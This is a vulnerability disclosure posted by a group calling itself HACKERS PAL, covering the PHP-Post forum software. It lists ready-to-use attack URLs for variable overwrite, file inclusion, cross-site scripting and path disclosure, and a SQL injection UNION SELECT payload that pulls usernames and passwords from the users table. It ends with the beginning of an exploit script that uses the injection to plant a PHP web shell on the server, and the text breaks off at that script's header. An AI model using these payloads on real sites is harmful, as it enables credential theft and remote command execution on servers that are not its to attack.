|
Hello,,=0D
=0D
PHP-Post Multiple Input Validation Vulnerabilities=0D
=0D
Discovered By : HACKERS PAL=0D
Copy rights : HACKERS PAL=0D
Website : http://www.soqor.net=0D
Email Address : security@soqor.net=0D
=0D
=0D
variables over write,,=0D
=0D
this php script is injected with variables over write bug=0D
try to make a new variable with the name of any exist variable and it will over write it :)=0D
=0D
example=0D
index.php?table_prefix=myprefix:)=0D
profile.php?table_prefix=myprefix:)%20where%201=1/*=0D
header.php?msgid=w&table_prefix=myprefix:)=0D
=0D
Sql=0D
profile.php?user='%20union%20select%20usernumber,7,7,username,7,7,7,7,7,7,username,7,userpassword,7,7,7,7,7,7,7,7%20from%20phpp_users%20where%20usernumber=1/*=0D
=0D
=0D
Include=0D
=0D
footer.php?template=22=0D
=0D
Xss=0D
=0D
pm.php?s=o&replyuser="><"=0D
dropdown.php?txt_jumpto="><"=0D
=0D
template.php?txt_error==0D
template.php?txt_templatenotexist==0D
=0D
add split to any link like=0D
editprofile.php?split==0D
search.php?split==0D
index.php?split==0D
pm.php?s=i&split==0D
=0D
all the files are injected=0D
=0D
=0D
if logged in=0D
loginline.php?txt_logout==0D
if not=0D
loginline.php?txt_login==0D
=0D
Full path=0D
footer.php?template=22=0D
=0D
template.php?template=red&logincookie[user]=ddddd=0D
=0D
template.php?template=red=0D
=0D
lastvisit.php?=0D
=0D
=0D
Exploit for sql injection:-=0D
Make phpshell named soqor.php in the forum dir=0D
=0D
#!/usr/bin/php -q -d short_open_tag=on=0D
=0D
/*=0D
/* PhP-post Sql injection Remote Command execution Exploit=0D
/* By : HACKERS PAL=0D
/* WwW.SoQoR.NeT=0D
*/=0D
print_r('=0D
/***********************************************/=0D
/* PHP-post remote sql injection make phpshell */=0D
/* by HACKERS PAL